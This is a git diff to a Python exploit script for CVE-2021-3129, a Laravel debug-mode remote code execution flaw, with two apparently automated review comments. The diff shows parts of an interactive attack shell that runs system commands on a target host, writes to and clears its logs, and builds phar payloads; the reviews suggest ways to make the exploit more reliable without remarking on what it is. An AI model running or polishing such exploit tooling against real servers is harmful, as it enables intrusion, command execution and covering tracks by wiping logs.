diff --git a/CVE-2021-3129.py b/CVE-2021-3129.py
index b375f4b..efa3d57 100644
--- a/CVE-2021-3129.py
+++ b/CVE-2021-3129.py
@@ -54,7 +54,7 @@ def ask_command(self):
 self.cmd_clear_logs()
 elif response[0:7] == "execute":
 self.cmd_execute_cmd(response[8:])
- elif response[0:7] == "write":
+ elif response[0:5] == "write":
 self.cmd_execute_write(response[6:])
 else:
 print(RED + f"[!] No command found named \"{response}\".")
@@ -67,7 +67,7 @@ def cmd_help(self):
 print(DARKCYAN + " help - Shows available commands.")
 print(DARKCYAN + " clear_logs - Clears Laravel logs.")
 print(DARKCYAN + " execute - Execute system command.")
- print(DARKCYAN + " write - Write to log file.")
+ print(DARKCYAN + " write - Write to log file.")
 def cmd_clear_logs(self):
 print(DARKCYAN + f"[@] Clearing Laravel logs...")
@@ -205,7 +205,8 @@ def generate_payload(self, command: str, padding=0) -> str:
 payload = 'A' * padding + payload
 payload = payload.replace("\n", "") + "A"
- os.unlink("./tmp.phar")
+ if os.path.exists('./tmp.phar'):
+ os.unlink("./tmp.phar")
 print(GREEN + f"[√] Generated payload.")
 return payload
@@ -216,7 +217,6 @@ def generate_write_payload(self, text: str, padding=0) -> str:
 payload = base64.b64encode(text.encode()).decode().rstrip('=')
 payload = ''.join(c + '=00' for c in payload)
 payload = 'A' * padding + payload
- os.unlink("./tmp.phar")
 print(GREEN + f"[√] Generated payload.")
 return payload
@@ -319,7 +319,7 @@ def find_laravel_version(self, content: str):
 if __name__ == "__main__":
 print(PURPLE + BOLD + "Laravel Debug Mode CVE script")
- print(END + PURPLE + "[•] Made by: https://jvdpoll.nl" + RED)
+ print(END + PURPLE + "[•] Made by: https://github.com/joshuavanderpoll/CVE-2021-3129" + RED)
 parser = argparse.ArgumentParser(description='Exploit CVE-2021-3129 - Laravel vulnerability exploit script')
 parser.add_argument('--host', help='Host URL to use exploit on', required=True)
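Review bot: The `write` branch in ask_command still dispatches on a fixed-width prefix, so `response[0:5] == "write"` accepts any input that merely begins with those five letters, and `response[6:]` then drops the sixth character without checking that it is a space; a bare `write` forwards an empty string. Because each branch triggers a request against a remote host, a mistyped command should be rejected rather than run with a mangled argument. Splitting once with `cmd, _, arg = response.partition(" ")` and testing `elif cmd == "write" and arg:` would make the match exact. The `execute` branch two lines above uses the same slicing pattern, and ask_command starts and ends outside the hunk.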
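Review bot: The guard added in generate_payload is a check-then-act pair, so `os.unlink("./tmp.phar")` can still raise if the file disappears between the `os.path.exists` test and the unlink. It also hides the case where the step that should have produced `tmp.phar` failed; that step is outside the hunk, so this is inferred. I would drop the `exists` test and put the `os.unlink("./tmp.phar")` call inside `try:` with `except FileNotFoundError:`, printing a warning there instead of passing silently. Separately, a fixed file name in the current working directory is predictable and can collide with a stale or pre-existing file; a per-run temporary path would be safer, if the rest of the function, which is not visible here, allows it.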